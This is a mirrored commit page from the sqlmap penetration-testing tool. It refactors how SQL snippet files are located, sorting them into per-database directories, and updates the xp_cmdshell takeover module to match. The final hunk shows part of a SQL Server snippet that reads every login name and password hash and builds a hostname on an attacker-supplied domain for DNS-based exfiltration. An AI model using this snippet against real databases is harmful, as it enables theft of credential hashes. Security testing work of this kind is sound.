sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-03 13:14:13 +03:00
Code Issues Packages Projects Releases Wiki Activity

minor update and refactoring

Browse Source
This commit is contained in:
Miroslav Stampar 2012-02-15 14:05:50 +00:00
parent bf923a97df
commit 8d7912ad34
5 changed files with 21 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
lib/core/common.py
View File

@ -61,6 +61,7 @@ from lib.core.convert import unicodeencode
from lib.core.convert import urldecode from lib.core.convert import urldecode
from lib.core.convert import urlencode from lib.core.convert import urlencode
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import HTTPHEADER from lib.core.enums import HTTPHEADER
from lib.core.enums import HTTPMETHOD from lib.core.enums import HTTPMETHOD
from lib.core.enums import OS from lib.core.enums import OS
@ -1807,12 +1808,14 @@ def parseXmlFile(xmlFile, handler):
parse(stream, handler) parse(stream, handler)
stream.close() stream.close()
def getSPLSnippet(name, **variables): def getSPLSnippet(dbms, name, **variables):
""" """
Returns content of SPL snippet located inside "procs" directory Returns content of SPL snippet located inside "procs" directory
""" """
filename = os.path.join(paths.SQLMAP_PROCS_PATH, "%s.txt" % name) _ = { DBMS.MSSQL: DBMS_DIRECTORY_NAME.MSSQL, DBMS.PGSQL: DBMS_DIRECTORY_NAME.PGSQL }
filename = os.path.join(paths.SQLMAP_PROCS_PATH, _[dbms], "%s.txt" % name)
checkFile(filename) checkFile(filename)
retVal = readCachedFileContent(filename) retVal = readCachedFileContent(filename)

14
lib/core/enums.py
View File

@ -26,6 +26,7 @@ class SORT_ORDER:
class DBMS: class DBMS:
ACCESS = "Microsoft Access" ACCESS = "Microsoft Access"
DB2 = "IBM DB2"
FIREBIRD = "Firebird" FIREBIRD = "Firebird"
MAXDB = "SAP MaxDB" MAXDB = "SAP MaxDB"
MSSQL = "Microsoft SQL Server" MSSQL = "Microsoft SQL Server"
@ -34,7 +35,18 @@ class DBMS:
PGSQL = "PostgreSQL" PGSQL = "PostgreSQL"
SQLITE = "SQLite" SQLITE = "SQLite"
SYBASE = "Sybase" SYBASE = "Sybase"
DB2 = "IBM DB2"
class DBMS_DIRECTORY_NAME:
ACCESS = "access"
DB2 = "db2"
FIREBIRD = "firebird"
MAXDB = "maxdb"
MSSQL = "mssqlserver"
MYSQL = "mysql"
ORACLE = "oracle"
PGSQL = "postgresql"
SQLITE = "sqlite"
SYBASE = "sybase"
class CUSTOM_LOGGING: class CUSTOM_LOGGING:
PAYLOAD = 9 PAYLOAD = 9

3
lib/takeover/xp_cmdshell.py
View File

@ -17,6 +17,7 @@ from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.data import paths from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.session import setXpCmdshellAvailability from lib.core.session import setXpCmdshellAvailability
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
@ -63,7 +64,7 @@ class xp_cmdshell:
debugMsg += "stored procedure" debugMsg += "stored procedure"
logger.debug(debugMsg) logger.debug(debugMsg)
cmd = getSPLSnippet("configure_xp_cmdshell", ENABLE=str(mode)) cmd = getSPLSnippet(DBMS.MSSQL, "configure_xp_cmdshell", ENABLE=str(mode))
return cmd return cmd

0
procs/configure_xp_cmdshell.txt → procs/mssqlserver/configure_xp_cmdshell.txt
View File

2
procs/mssql_dns_request.txt → procs/mssqlserver/dns_request.txt
View File

@ -1,4 +1,4 @@
# Reference: http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf # Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
DECLARE @host varchar(1024); DECLARE @host varchar(1024);
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins; SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;